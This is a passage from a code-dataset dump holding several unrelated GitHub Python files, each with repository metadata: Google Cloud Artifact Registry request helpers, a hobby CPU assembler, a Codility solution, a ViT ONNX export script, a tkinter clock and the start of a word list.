GetMessages()\n get_ver_req = (\n messages\n .ArtifactregistryProjectsLocationsRepositoriesPackagesVersionsGetRequest(\n name=version))\n return client.projects_locations_repositories_packages_versions.Get(get_ver_req)\n\n\ndef GetVersionFromTag(client, messages, tag):\n \"\"\"Gets a version name by a tag name.\"\"\"\n get_tag_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsGetRequest(\n name=tag)\n get_tag_res = 
client.projects_locations_repositories_packages_tags.Get(\n get_tag_req)\n if not get_tag_res.version or len(get_tag_res.version.split(\"/\")) != 10:\n raise ar_exceptions.ArtifactRegistryError(\n \"Internal error. Corrupted tag: {}\".format(tag))\n return get_tag_res.version.split(\"/\")[-1]\n\n\ndef ListTags(client, messages, package, page_size=None):\n \"\"\"Lists all tags under a package with the given package name.\"\"\"\n list_tags_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsListRequest(\n parent=package)\n return list(\n list_pager.YieldFromList(\n client.projects_locations_repositories_packages_tags,\n list_tags_req,\n batch_size=page_size,\n batch_size_attribute=\"pageSize\",\n field=\"tags\"))\n\n\ndef ListVersionTags(client, messages, package, version, page_size=None):\n \"\"\"Lists tags associated with the given version.\"\"\"\n list_tags_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsListRequest(\n parent=package, filter=\"version=\\\"{}\\\"\".format(version))\n return list(\n list_pager.YieldFromList(\n client.projects_locations_repositories_packages_tags,\n list_tags_req,\n batch_size=page_size,\n batch_size_attribute=\"pageSize\",\n field=\"tags\"))\n\n\ndef ListPackages(client, messages, repo, page_size=None):\n \"\"\"Lists all packages under a repository.\"\"\"\n list_pkgs_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesListRequest(\n parent=repo)\n return list(\n list_pager.YieldFromList(\n client.projects_locations_repositories_packages,\n list_pkgs_req,\n batch_size=page_size,\n batch_size_attribute=\"pageSize\",\n field=\"packages\"))\n\n\ndef ListVersions(client, messages, pkg, version_view,\n page_size=None, order_by=None, limit=None):\n \"\"\"Lists all versions under a package.\"\"\"\n page_limit = limit\n if limit is None or (page_size is not None and page_size < limit):\n page_limit = page_size\n\n list_vers_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesVersionsListRequest(\n parent=pkg, view=version_view, orderBy=order_by)\n return list(\n list_pager.YieldFromList(\n client.projects_locations_repositories_packages_versions,\n list_vers_req,\n limit=limit,\n batch_size=page_limit,\n batch_size_attribute=\"pageSize\",\n field=\"versions\"))\n\n\ndef ListRepositories(project, page_size=None):\n \"\"\"Lists all repositories under a project.\"\"\"\n client = GetClient()\n messages = GetMessages()\n list_repos_req = messages.ArtifactregistryProjectsLocationsRepositoriesListRequest(\n parent=project)\n return list(\n list_pager.YieldFromList(\n client.projects_locations_repositories,\n list_repos_req,\n batch_size=page_size,\n batch_size_attribute=\"pageSize\",\n field=\"repositories\"))\n\n\ndef ListFiles(client, messages, repo, arg_filters, page_size=None):\n \"\"\"Lists all files under a repository.\"\"\"\n client = GetClient()\n messages = GetMessages()\n list_files_req = (\n messages.ArtifactregistryProjectsLocationsRepositoriesFilesListRequest(\n parent=repo, filter=arg_filters))\n return list(\n list_pager.YieldFromList(\n client.projects_locations_repositories_files,\n list_files_req,\n batch_size=page_size,\n batch_size_attribute=\"pageSize\",\n field=\"files\"))\n\n\ndef GetRepository(repo, skip_activation_prompt=False):\n \"\"\"Gets the repository given its name.\"\"\"\n client = GetClient(skip_activation_prompt)\n messages = GetMessages()\n get_repo_req = messages.ArtifactregistryProjectsLocationsRepositoriesGetRequest(\n name=repo)\n get_repo_res = 
client.projects_locations_repositories.Get(get_repo_req)\n return get_repo_res\n\n\ndef GetIamPolicy(repo_res):\n \"\"\"Gets the IAM policy for the specified repository.\"\"\"\n client = GetClient()\n messages = GetMessages()\n get_iam_policy_req = messages.ArtifactregistryProjectsLocationsRepositoriesGetIamPolicyRequest(\n resource=repo_res)\n get_iam_policy_res = client.projects_locations_repositories.GetIamPolicy(\n get_iam_policy_req)\n return get_iam_policy_res\n\n\ndef CreateRepository(\n project, location, repository, skip_activation_prompt=False\n):\n \"\"\"Creates the repository given its parent.\n\n Args:\n project: str: The project to create the repository in.\n location: str: The region to create the repository in.\n repository: messages.Repository to create.\n skip_activation_prompt: bool: If true, do not prompt for service activation\n\n Returns:\n The resulting operation from the create request.\n \"\"\"\n client = GetClient(skip_activation_prompt)\n messages = GetMessages()\n request = messages.ArtifactregistryProjectsLocationsRepositoriesCreateRequest(\n parent=\"projects/{}/locations/{}\".format(project, location),\n repositoryId=repository.name.split(\"/\")[-1],\n repository=repository)\n return client.projects_locations_repositories.Create(request)\n\n\ndef GetPackage(package):\n \"\"\"Gets the package given its name.\"\"\"\n client = GetClient()\n messages = GetMessages()\n get_package_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesGetRequest(\n name=package)\n get_package_res = client.projects_locations_repositories_packages.Get(\n get_package_req)\n return get_package_res\n\n\ndef ListLocations(project_id, page_size=None):\n \"\"\"Lists all locations for a given project.\"\"\"\n client = GetClientV1beta2()\n messages = GetMessagesV1beta2()\n list_locs_req = messages.ArtifactregistryProjectsLocationsListRequest(\n name=\"projects/\" + project_id)\n locations = list_pager.YieldFromList(\n client.projects_locations,\n list_locs_req,\n batch_size=page_size,\n batch_size_attribute=\"pageSize\",\n field=\"locations\")\n return sorted([loc.locationId for loc in locations])\n\n\ndef TestStorageIAMPermission(bucket, project):\n \"\"\"Tests storage IAM permission for a given bucket for the user project.\"\"\"\n client = GetStorageClient()\n messages = GetStorageMessages()\n test_req = messages.StorageBucketsTestIamPermissionsRequest(\n bucket=bucket, permissions=_GCR_PERMISSION, userProject=project)\n return client.buckets.TestIamPermissions(test_req)\n\n\ndef GetCryptoKeyPolicy(kms_key):\n \"\"\"Gets the IAM policy for a given crypto key.\"\"\"\n crypto_key_ref = resources.REGISTRY.ParseRelativeName(\n relative_name=kms_key, collection=CRYPTO_KEY_COLLECTION)\n return kms_iam.GetCryptoKeyIamPolicy(crypto_key_ref)\n\n\ndef AddCryptoKeyPermission(kms_key, service_account):\n \"\"\"Adds Encrypter/Decrypter role to the given service account.\"\"\"\n crypto_key_ref = resources.REGISTRY.ParseRelativeName(\n relative_name=kms_key, collection=CRYPTO_KEY_COLLECTION)\n return kms_iam.AddPolicyBindingToCryptoKey(\n crypto_key_ref, service_account,\n \"roles/cloudkms.cryptoKeyEncrypterDecrypter\")\n\n\ndef GetServiceAccount(service_account):\n \"\"\"Gets the service account given its email.\"\"\"\n client, messages = iam_api.GetClientAndMessages()\n return client.projects_serviceAccounts.Get(\n messages.IamProjectsServiceAccountsGetRequest(\n name=iam_util.EmailToAccountResourceName(service_account)))\n\n\ndef TestRedirectionIAMPermission(project):\n \"\"\"Tests the 
user has the storage.buckets.update IAM permission on the project.\"\"\"\n project_ref = project_util.ParseProject(project)\n result = projects_api.TestIamPermissions(project_ref, REDIRECT_PERMISSIONS)\n return set(REDIRECT_PERMISSIONS) == set(result.permissions)\n\n\ndef GetProjectSettings(project_id):\n client = GetClient()\n messages = GetMessages()\n get_settings_req = messages.ArtifactregistryProjectsGetProjectSettingsRequest(\n name=\"projects/\" + project_id + \"/projectSettings\")\n return client.projects.GetProjectSettings(get_settings_req)\n\n\ndef GetVPCSCConfig(project_id, location_id):\n \"\"\"Gets VPC SC Config on the project and location.\"\"\"\n client = GetClient()\n messages = GetMessages()\n get_vpcsc_req = messages.ArtifactregistryProjectsLocationsGetVpcscConfigRequest(\n name=\"projects/\" + project_id + \"/locations/\" + location_id +\n \"/vpcscConfig\")\n return client.projects_locations.GetVpcscConfig(get_vpcsc_req)\n\n\ndef AllowVPCSCConfig(project_id, location_id):\n \"\"\"Allows requests in Remote Repository inside VPC SC perimeter.\"\"\"\n client = GetClient()\n messages = GetMessages()\n vc = messages.VPCSCConfig(\n name=\"projects/\" + project_id + \"/locations/\" + location_id +\n \"/vpcscConfig\",\n vpcscPolicy=messages.VPCSCConfig.VpcscPolicyValueValuesEnum.ALLOW)\n update_vpcsc_req = messages.ArtifactregistryProjectsLocationsUpdateVpcscConfigRequest(\n name=\"projects/\" + project_id + \"/locations/\" + location_id +\n \"/vpcscConfig\",\n vPCSCConfig=vc)\n return client.projects_locations.UpdateVpcscConfig(update_vpcsc_req)\n\n\ndef DenyVPCSCConfig(project_id, location_id):\n \"\"\"Denies requests in Remote Repository inside VPC SC perimeter.\"\"\"\n client = GetClient()\n messages = GetMessages()\n vc = messages.VPCSCConfig(\n name=\"projects/\" + project_id + \"/locations/\" + location_id +\n \"/vpcscConfig\",\n vpcscPolicy=messages.VPCSCConfig.VpcscPolicyValueValuesEnum.DENY)\n get_vpcsc_req = messages.ArtifactregistryProjectsLocationsUpdateVpcscConfigRequest(\n name=\"projects/\" + project_id + \"/locations/\" + location_id +\n \"/vpcscConfig\",\n vPCSCConfig=vc)\n return client.projects_locations.UpdateVpcscConfig(get_vpcsc_req)\n\n\ndef EnableUpgradeRedirection(project_id):\n messages = GetMessages()\n return SetUpgradeRedirectionState(\n project_id, messages.ProjectSettings.LegacyRedirectionStateValueValuesEnum\n .REDIRECTION_FROM_GCR_IO_ENABLED)\n\n\ndef DisableUpgradeRedirection(project_id):\n messages = GetMessages()\n return SetUpgradeRedirectionState(\n project_id, messages.ProjectSettings.LegacyRedirectionStateValueValuesEnum\n .REDIRECTION_FROM_GCR_IO_DISABLED)\n\n\ndef FinalizeUpgradeRedirection(project_id):\n messages = GetMessages()\n return SetUpgradeRedirectionState(\n project_id, messages.ProjectSettings.LegacyRedirectionStateValueValuesEnum\n .REDIRECTION_FROM_GCR_IO_FINALIZED)\n\n\ndef SetUpgradeRedirectionState(project_id, redirection_state):\n \"\"\"Sets the upgrade redirection state for the supplied project.\"\"\"\n client = GetClient()\n messages = GetMessages()\n project_settings = messages.ProjectSettings(\n legacyRedirectionState=redirection_state)\n update_mask = \"legacy_redirection_state\"\n update_settings_req = messages.ArtifactregistryProjectsUpdateProjectSettingsRequest(\n name=\"projects/\" + project_id + \"/projectSettings\",\n projectSettings=project_settings,\n updateMask=update_mask)\n return 
client.projects.UpdateProjectSettings(update_settings_req)\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/artifacts/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":14890,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"22498696400","text":"import argparse\nimport ast\nfrom functools import partial\n\n# TODO:\n# - MAKE > and < work\n\nmnemonics = {\n\t\"NOP\": {\n\t\t\"\": 0x01\n\t},\n\t\"STR\": {\n\t\t\"R0 ADR\": 0x09,\n\t\t\"R1 ADR\": 0x0a,\n\t\t\"R2 ADR\": 0x0b,\n\t\t\"R3 ADR\": 0x0c,\n\t\t\"ACC ADR\": 0x0d,\n\t\t\"LIT ADR\": 0x0e,\n\t\t\"R0 ZP\": 0x0f,\n\t\t\"R1 ZP\": 0x10,\n\t\t\"R2 ZP\": 0x11,\n\t\t\"R3 ZP\": 0x12,\n\t\t\"ACC ZP\": 0x13,\n\t\t\"LIT ZP\": 0x14,\n\t},\n\t\"STRI\": {\n\t\t\"R0 ADR\": 0x15,\n\t\t\"R1 ADR\": 0x16,\n\t\t\"R2 ADR\": 0x17,\n\t\t\"R3 ADR\": 0x18,\n\t\t\"ACC ADR\": 0x19,\n\t\t\"LIT ADR\": 0x56,\n\t}, \"STRIZ\": {\n\t\t\"R0 ZP\": 0x1a,\n\t\t\"R1 ZP\": 0x1b,\n\t\t\"R2 ZP\": 0x1c,\n\t\t\"R3 ZP\": 0x1d,\n\t\t\"ACC ZP\": 0x1e,\n\t\t\"LIT ZP\": 0x57,\n\t},\n\t\"LOD\": {\n\t\t\"ADR R0\": 0x1f,\n\t\t\"ADR R1\": 0x20,\n\t\t\"ADR R2\": 0x21,\n\t\t\"ADR R3\": 0x22,\n\t\t\"ADR ACC\": 0x23,\n\t\t\"ZP R0\": 0x24,\n\t\t\"ZP R1\": 0x25,\n\t\t\"ZP R2\": 0x26,\n\t\t\"ZP R3\": 0x27,\n\t\t\"ZP ACC\": 0x28,\n\t\t\"LIT R0\": 0x29,\n\t\t\"LIT R1\": 0x2a,\n\t\t\"LIT R2\": 0x2b,\n\t\t\"LIT R3\": 0x2c,\n\t\t\"LIT ACC\": 0x2d,\n\t},\n\t\"LODI\": {\n\t\t\"ADR R0\": 0x2e,\n\t\t\"ADR R1\": 0x2f,\n\t\t\"ADR R2\": 0x30,\n\t\t\"ADR R3\": 0x31,\n\t\t\"ADR ACC\": 0x32,\n\t}, \"LODIZ\": {\n\t\t\"ZP R0\": 0x33,\n\t\t\"ZP R1\": 0x34,\n\t\t\"ZP R2\": 0x35,\n\t\t\"ZP R3\": 0x36,\n\t\t\"ZP ACC\": 0x37,\n\t},\n\t\"TRN\": {\n\t\t\"R0 R1\": 0x38,\n\t\t\"R0 R2\": 0x39,\n\t\t\"R0 R3\": 0x3a,\n\t\t\"R0 ACC\": 0x3b,\n\t\t\"R1 R0\": 0x3c,\n\t\t\"R1 R2\": 0x3d,\n\t\t\"R1 R3\": 0x3e,\n\t\t\"R1 ACC\": 0x3f,\n\t\t\"R2 R0\": 0x40,\n\t\t\"R2 R1\": 0x41,\n\t\t\"R2 R3\": 0x42,\n\t\t\"R2 ACC\": 0x43,\n\t\t\"R3 R0\": 0x44,\n\t\t\"R3 R1\": 0x45,\n\t\t\"R3 R2\": 0x46,\n\t\t\"R3 ACC\": 0x47,\n\t\t\"ACC R0\": 0x48,\n\t\t\"ACC R1\": 0x49,\n\t\t\"ACC R2\": 0x4a,\n\t\t\"ACC R3\": 0x4b,\n\t\t\"SP R0\": 0x4c,\n\t\t\"SP R1\": 0x4d,\n\t\t\"SP R2\": 0x4e,\n\t\t\"SP R3\": 0x4f,\n\t\t\"SP ACC\": 0x50,\n\t\t\"FLG R0\": 0x51,\n\t\t\"FLG R1\": 0x52,\n\t\t\"FLG R2\": 0x53,\n\t\t\"FLG R3\": 0x54,\n\t\t\"FLG ACC\": 0x55,\n\t},\n\t\"ADD\": {\n\t\t\"R0\": 0x5e,\n\t\t\"R1\": 0x5f,\n\t\t\"R2\": 0x60,\n\t\t\"R3\": 0x61,\n\t\t\"ACC\": 0x62,\n\t\t\"LIT\": 0x63,\n\t},\n\t\"ADDC\": {\n\t\t\"R0\": 0x64,\n\t\t\"R1\": 0x65,\n\t\t\"R2\": 0x66,\n\t\t\"R3\": 0x67,\n\t\t\"ACC\": 0x68,\n\t\t\"LIT\": 0x69,\n\t},\n\t\"SUB\": {\n\t\t\"R0\": 0x6a,\n\t\t\"R1\": 0x6b,\n\t\t\"R2\": 0x6c,\n\t\t\"R3\": 0x6d,\n\t\t\"LIT\": 0x6e,\n\t},\n\t\"SUBC\": {\n\t\t\"R0\": 0x6f,\n\t\t\"R1\": 0x70,\n\t\t\"R2\": 0x71,\n\t\t\"R3\": 0x72,\n\t\t\"LIT\": 0x73,\n\t},\n\t\"SHR\": {\n\t\t\"R0\": 0x74,\n\t\t\"R1\": 0x75,\n\t\t\"R2\": 0x76,\n\t\t\"R3\": 0x77,\n\t\t\"ACC\": 0x78,\n\t\t\"LIT\": 0x79,\n\t},\n\t\"SHL\": {\n\t\t\"R0\": 0x7a,\n\t\t\"R1\": 0x7b,\n\t\t\"R2\": 0x7c,\n\t\t\"R3\": 0x7d,\n\t\t\"ACC\": 0x7e,\n\t\t\"LIT\": 0x7f,\n\t},\n\t\"AND\": {\n\t\t\"R0\": 0x80,\n\t\t\"R1\": 0x81,\n\t\t\"R2\": 0x82,\n\t\t\"R3\": 0x83,\n\t\t\"LIT\": 0x84,\n\t},\n\t\"OR\": {\n\t\t\"R0\": 0x85,\n\t\t\"R1\": 0x86,\n\t\t\"R2\": 0x87,\n\t\t\"R3\": 0x88,\n\t\t\"LIT\": 0x89,\n\t},\n\t\"XOR\": {\n\t\t\"R0\": 0x8a,\n\t\t\"R1\": 0x8b,\n\t\t\"R2\": 
0x8c,\n\t\t\"R3\": 0x8d,\n\t\t\"LIT\": 0x8e,\n\t},\n\t\"NOT\": {\n\t\t\"\": 0x8f,\n\t},\n\t\"INC\": {\n\t\t\"R0\": 0x90,\n\t\t\"R1\": 0x91,\n\t\t\"R2\": 0x92,\n\t\t\"R3\": 0x93,\n\t\t\"ACC\": 0x94,\n\t},\n\t\"DEC\": {\n\t\t\"R0\": 0x95,\n\t\t\"R1\": 0x96,\n\t\t\"R2\": 0x97,\n\t\t\"R3\": 0x98,\n\t\t\"ACC\": 0x99,\n\t},\n\t\"PSH\": {\n\t\t\"R0\": 0xa2,\n\t\t\"R1\": 0xa3,\n\t\t\"R2\": 0xa4,\n\t\t\"R3\": 0xa5,\n\t\t\"ACC\": 0xa6,\n\t\t\"LIT\": 0xa7,\n\t},\n\t\"POP\": {\n\t\t\"R0\": 0xa8,\n\t\t\"R1\": 0xa9,\n\t\t\"R2\": 0xaa,\n\t\t\"R3\": 0xab,\n\t\t\"ACC\": 0xac,\n\t},\n\t\"DRP\": {\n\t\t\"\": 0xad,\n\t},\n\t\"CMP\": {\n\t\t\"R0 R1\": 0xb6,\n\t\t\"R0 R2\": 0xb7,\n\t\t\"R0 R3\": 0xb8,\n\t\t\"R0 ACC\": 0xb9,\n\t\t\"R1 R0\": 0xba,\n\t\t\"R1 R2\": 0xbb,\n\t\t\"R1 R3\": 0xbc,\n\t\t\"R1 ACC\": 0xbd,\n\t\t\"R2 R0\": 0xbe,\n\t\t\"R2 R1\": 0xbf,\n\t\t\"R2 R3\": 0xc0,\n\t\t\"R2 ACC\": 0xc1,\n\t\t\"R3 R0\": 0xc2,\n\t\t\"R3 R1\": 0xc3,\n\t\t\"R3 R2\": 0xc4,\n\t\t\"R3 ACC\": 0xc5,\n\t\t\"ACC R0\": 0xc6,\n\t\t\"ACC R1\": 0xc7,\n\t\t\"ACC R2\": 0xc8,\n\t\t\"ACC R3\": 0xc9,\n\t\t\"R0 LIT\": 0xca,\n\t\t\"R1 LIT\": 0xcb,\n\t\t\"R2 LIT\": 0xcc,\n\t\t\"R3 LIT\": 0xcd,\n\t\t\"ACC LIT\": 0xce,\n\t},\n\t\"BRA\": {\n\t\t\"S ADR\": 0xcf,\n\t\t\"C ADR\": 0xd0,\n\t\t\"I ADR\": 0xd1,\n\t\t\"O ADR\": 0xd2,\n\t\t\"G ADR\": 0xd3,\n\t\t\"Z ADR\": 0xd4,\n\t},\n\t\"BRAN\": {\n\t\t\"S ADR\": 0xd5,\n\t\t\"C ADR\": 0xd6,\n\t\t\"I ADR\": 0xd7,\n\t\t\"O ADR\": 0xd8,\n\t\t\"G ADR\": 0xd9,\n\t\t\"Z ADR\": 0xda,\n\t},\n\t\"JMP\": {\n\t\t\"ADR\": 0xdb,\n\t},\n\t\"JMPI\": {\n\t\t\"ADR\": 0xdc,\n\t},\n\t\"JSR\": {\n\t\t\"ADR\": 0xdd,\n\t},\n\t\"JSRI\": {\n\t\t\"ADR\": 0xde,\n\t},\n\t\"RET\": {\n\t\t\"\": 0xdf,\n\t},\n\t\"RETI\": {\n\t\t\"\": 0xe0,\n\t},\n\t\"SET\": {\n\t\t\"S\": 0xe9,\n\t\t\"C\": 0xea,\n\t\t\"I\": 0xeb,\n\t\t\"O\": 0xec,\n\t\t\"G\": 0xed,\n\t\t\"Z\": 0xee,\n\t},\n\t\"CLR\": {\n\t\t\"S\": 0xef,\n\t\t\"C\": 0xf0,\n\t\t\"I\": 0xf1,\n\t\t\"O\": 0xf2,\n\t\t\"G\": 0xf3,\n\t\t\"Z\": 0xf4,\n\t}\n}\n\ndef parse_number(arg):\n\tif arg[0] in \"0123456789\":\n\t\treturn int(arg)\n\tif arg.startswith(\"!\"):\n\t\treturn int(arg[1:])\n\tif arg.startswith(\"$\"):\n\t\treturn int(arg[1:], 16)\n\tif arg.startswith(\"%\"):\n\t\treturn int(arg[1:], 2)\n\ndef interpret_argument(arg, instruction):\n\tif arg.startswith(\":\"):\n\t\treturn \"ADR\"\n\telif arg.startswith(\"R\"):\n\t\treturn arg\n\telif arg in \"SCIOGZ\":\n\t\treturn arg\n\telif arg.startswith(\"#\"):\n\t\treturn \"LIT\"\n\telif arg.startswith(\">\"): # access high (left) byte of label as literal\n\t\treturn \"LIT\"\n\telif arg.startswith(\"<\"): # access low (right) byte of label as literal\n\t\treturn \"LIT\"\n\telif arg[0] in \"0123456789$%!\":\n\t\tif parse_number(arg) < 256 and instruction in [\"STR\", \"STRIZ\", \"LOD\", \"LODIZ\"]:\n\t\t\treturn \"ZP\"\n\t\telse:\n\t\t\treturn \"ADR\"\n\telif arg in [\"ACC\", \"SP\", \"FLG\"]:\n\t\treturn arg\n\telif arg in constants_lit:\n\t\treturn \"LIT\"\n\telif arg in constants_adr:\n\t\tif parse_number(constants_adr[arg]) < 256 and instruction in [\"STR\", \"STRIZ\", \"LOD\", \"LODIZ\"]:\n\t\t\treturn \"ZP\"\n\t\telse:\n\t\t\treturn \"ADR\"\n\telse:\n\t\traise Exception(\"Invalid argument: \" + arg)\n\ndef argument_size(arg):\n\tif arg == \"ADR\":\n\t\treturn 2\n\tif arg == \"ZP\":\n\t\treturn 1\n\tif arg == \"LIT\":\n\t\treturn 1\n\treturn 0\n\n# Possibly make addresses controlled by floppy controller\ndef compile(source, location=0x0200):\n\tglobal constants_lit\n\tglobal constants_adr\n\n\tlabels = {}\n\tinstructions = []\n\tlength = 
0\n\tconstants_lit = {}\n\tconstants_adr = {}\n\n\tfor line in source.split(\"\\n\"):\n\t\tparts = line.strip().upper().split(\";\")[0].split()\n\n\t\tif not parts:\n\t\t\tcontinue\n\n\t\tif parts[0].startswith(\":\"):\n\t\t\tassert len(parts) == 1, \"Whitespace isn't allowed in label names\"\n\t\t\tlabels[parts[0][1:]] = length + location\n\t\telif parts[0].startswith(\"LIT\"):\n\t\t\tconstants_lit[parts[1]] = parts[2]\n\t\telif parts[0].startswith(\"ADR\"):\n\t\t\tconstants_adr[parts[1]] = parts[2]\n\t\telse:\n\t\t\tif parts[0] == \"BYTES\":\n\t\t\t\tinstructions.append(parts)\n\t\t\t\tlength += sum(map(argument_size,\n\t\t\t\t\tmap(partial(interpret_argument, instruction=parts[0]), parts[1:])))\n\t\t\t\tcontinue\n\n\t\t\tassert (parts[0] in mnemonics), \"Unrecognized mnemonic: \" + parts[0]\n\t\t\tinstructions.append(parts)\n\n\t\t\tlength += 1 + sum(map(argument_size,\n\t\t\t\tmap(partial(interpret_argument, instruction=parts[0]), parts[1:])))\n\n\tfor instruction in instructions:\n\t\tprint(instruction)\n\t\tif (instruction[0] != \"BYTES\"):\n\t\t\tyield mnemonics[instruction[0]][\n\t\t\t\t\" \".join(map(partial(interpret_argument,\n\t\t\t\t\tinstruction=instruction[0]), instruction[1:]))]\n\n\t\tfor arg in instruction[1:]:\n\t\t\tif arg in constants_lit:\n\t\t\t\targ = constants_lit[arg]\n\t\t\tif arg in constants_adr:\n\t\t\t\targ = constants_adr[arg]\n\t\t\ttype = interpret_argument(arg, instruction[0])\n\t\t\tif type == \"ADR\":\n\t\t\t\tif arg[0] == \":\":\n\t\t\t\t\taddress = labels[arg[1:]]\n\t\t\t\telse:\n\t\t\t\t\taddress = parse_number(arg)\n\t\t\t\tyield address >> 8\n\t\t\t\tyield address & 0xff\n\t\t\telif type == \"ZP\":\n\t\t\t\tyield parse_number(arg)\n\t\t\telif type == \"LIT\":\n\t\t\t\tif arg[0] == \"<\":\n\t\t\t\t\tyield parse_number(str(labels[arg[2:]] & 0xFF))\n\t\t\t\telif arg[0] == \">\":\n\t\t\t\t\tyield parse_number(str((labels[arg[2:]] >> 8) & 0xFF))\n\t\t\t\telse:\n\t\t\t\t\tyield parse_number(arg[1:])\n\tprint(\"\\nLabels:\")\n\tfor i in labels:\n\t\tprint(i + \" = \" + hex(labels[i]))\n\tprint(\"\\nAddress Constants:\")\n\tfor i in constants_adr:\n\t\tprint(i + \" = \" + str(constants_adr[i]))\n\tprint(\"\\nLiteral Constants:\")\n\tfor i in constants_lit:\n\t\tprint(i + \" = \" + str(constants_lit[i]))\n\nif __name__ == \"__main__\":\n\tp = argparse.ArgumentParser(description=\"Assemble Lovelace assembly language.\")\n\tp.add_argument(\"file\", help=\"an input assembly file\")\n\tp.add_argument(\"-o\", \"--output\", default=\"lovelace.o\",\n\t\thelp=\"the output filename\")\n\tp.add_argument(\"-f\", \"--offset\", default=\"0x0200\", type=ast.literal_eval,\n\t\thelp=\"the address offset to use for labels\")\n\n\targs = p.parse_args()\n\twith open(args.file) as f:\n\t\tsource = f.read()\n\n\tprint(\"\\nInstructions:\")\n\tcode = bytes(compile(source, args.offset))\n\n\tprint(\"\\nBytes:\")\n\tprint(\"0x\" + \", 0x\".join(code.hex()[i:i+2] for i in range(0, len(code.hex()), 2)))\n\twith open(args.output, \"wb\") as f:\n\t\tf.write(code)\n","repo_name":"DivergentClouds/Lovelace","sub_path":"asm/py-assembler/assemble.py","file_name":"assemble.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"7"} +{"seq_id":"38835924567","text":"# you can write to stdout for debugging purposes, e.g.\n# print \"this is a debug message\"\nfrom collections import defaultdict\n\ndef solution(A):\n # write your code in Python 2.7\n lenA = len(A)\n sumA = sum(A)\n dictCount = 
defaultdict(int)\n for item in A:\n dictCount[item] += 1\n if max(dictCount.values()) == 1 and lenA * (lenA + 1) // 2 == sumA:\n return 1\n return 0\n","repo_name":"sshishov/sshishov.github.io","sub_path":"codility/04_lesson/02_PermCheck.py","file_name":"02_PermCheck.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72844621982","text":"\"\"\"\r\nCopyright 2020 Huawei Technologies Co., Ltd\r\n\r\nLicensed under the Apache License, Version 2.0 (the \"License\");\r\nyou may not use this file except in compliance with the License.\r\nYou may obtain a copy of the License at\r\n\r\n http://www.apache.org/licenses/LICENSE-2.0\r\n\r\nUnless required by applicable law or agreed to in writing, software\r\ndistributed under the License is distributed on an \"AS IS\" BASIS,\r\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\nSee the License for the specific language governing permissions and\r\nlimitations under the License.\r\n\"\"\"\r\nimport os\r\nimport torch\r\nimport timm\r\nimport argparse\r\n\r\n\r\ndef parse_arguments():\r\n parser = argparse.ArgumentParser(description='Path', add_help=False)\r\n parser.add_argument('--model_path', required=True, metavar='DIR',\r\n help='path to model')\r\n parser.add_argument('--save_dir', default=\"models/onnx\", type=str,\r\n help='save dir for onnx model')\r\n parser.add_argument('--batch_size', default=1, type=int,\r\n help='batch size')\r\n parser.add_argument('--model_name', required=True, type=str,\r\n help='model name for ViT')\r\n \r\n return parser.parse_args()\r\n\r\n\r\ndef main():\r\n args = parse_arguments()\r\n model = timm.create_model(args.model_name)\r\n model.load_pretrained(args.model_path)\r\n model.eval()\r\n input_size = int(args.model_name[-3:])\r\n tensor = torch.zeros(args.batch_size, 3, input_size, input_size)\r\n\r\n if not os.path.exists(args.save_dir):\r\n os.makedirs(args.save_dir)\r\n\r\n save_path = os.path.join(args.save_dir,\r\n f\"{args.model_name}_bs{args.batch_size}.onnx\")\r\n torch.onnx.export(model, tensor, save_path, opset_version=11,\r\n do_constant_folding=True, input_names=[\"input\"], output_names=[\"output\"])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"ACL_PyTorch/contrib/cv/classfication/ViT_base/Vit_base_pth2onnx.py","file_name":"Vit_base_pth2onnx.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"42830066096","text":"#Hayden Whitney\n#9/18\n#Clock\n\nfrom tkinter import*\nfrom tkinter import ttk\nfrom tkinter import font\nimport time\nimport calendar\nimport datetime\n\ndef gmtnow():\n total_seconds = calendar.timegm(time.gmtime())\n current_second = total_seconds % 60\n total_minutes = total_seconds //60\n current_minute = total_minutes % 60\n total_hours = total_minutes // 60\n current_hour = total_hours % 24\n current_hour = (current_hour - 6) % 24 # shift UTC to UTC-6 without going negative\n if current_hour >= 12:\n tag = \" PM\"\n else:\n tag = \" AM\"\n timex = str(current_hour) + \":\" + str(current_minute).zfill(2) + \":\" + str(current_second).zfill(2) + tag\n return timex\n\ndef quit(*args):\n root.destroy()\n\ndef show_time():\n time = gmtnow()\n txt.set(time)\n root.after(1000, show_time)\n\nroot = Tk()\nroot.attributes(\"-fullscreen\", False)\nroot.configure(background = 'White')\nroot.bind(\"x\", quit)\nroot.after(1000, show_time)\n\nfnt = font.Font(family = 
'Courier', size = 60)\ntxt = StringVar()\nlbl = ttk.Label(root, textvariable = txt, font = fnt, foreground = 'Black', background = 'White')\nlbl.place(relx = 0.5, rely = 0.5, anchor = CENTER)\n\nroot.mainloop()\n\n \n\n\n\n","repo_name":"haydenwhitney/portfolio","sub_path":"Clock/clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24566472647","text":"import random\n\nadjectives = [\n \"abandoned\",\n \"aching\",\n \"advanced\",\n \"ample\",\n \"artistic\",\n \"back\",\n \"best\",\n \"bold\",\n \"brief\",\n \"clear\",\n \"cold\",\n \"complicated\",\n \"cooked\",\n \"crazy\",\n \"crushing\",\n \"damp\",\n \"dear\",\n \"definite\",\n \"dependable\",\n \"diligent\",\n \"drab\",\n \"earnest\",\n \"elderly\",\n \"enchanted\",\n 